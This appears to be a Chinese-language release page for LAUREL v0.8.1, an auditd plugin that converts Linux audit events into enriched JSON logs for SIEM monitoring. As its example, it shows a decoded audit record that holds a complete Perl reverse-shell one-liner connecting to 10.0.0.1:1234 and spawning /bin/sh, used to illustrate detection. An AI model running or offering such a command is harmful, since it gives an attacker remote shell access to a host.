
新发布Jul 16, 2026
laurel v0.8.1
转换 Linux 审计日志以供 SIEM 使用
Linux 审计 – 可用、健壮、简单日志
LAUREL 是 auditd(8) 的事件后处理插件,可生成有用的、丰富化的 JSON 格式审计日志,适用于现代安全监控设置。
最新稳定版对应的文档可在此处找到。
为什么?
长话短说:与其像这样查看审计事件……
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
……LAUREL 将它们转换为 JSON 日志,使攻击者/渗透测试人员/红队试图制造的混乱一目了然:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
这一切在源头发生,因为 LAUREL 运行在生成审计事件的主机上。事件会包含关于父进程(ppid)的有用信息:
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
文档
配置和操作细节在 laurel(8) 手册页中描述。 关于日志格式及其理由的详细信息,请参见 laurel-about(7) 手册页。laurel-audit-rules(7) 页面包含了审计规则配置的建议和示例,用于检测攻击者的战术。
LAUREL 安装说明包含了如何从源码构建 LAUREL 以及安装和配置它的指导。
我们开发 LAUREL 是因为对现有项目和产品的功能集及性能特性不满意。详情请参考性能文档。
参见
- ansible-auditd-laurel,一个用于部署 auditd + laurel 的 Ansible 角色,由 @0xFustang / CERT-EU 编写
许可证
GNU 通用公共许可证,第3版
作者
- Hilko Bengen <[email protected]>
- Sergej Schmidt <[email protected]>
Logo 由 Birgit Meyer <[email protected]> 创建。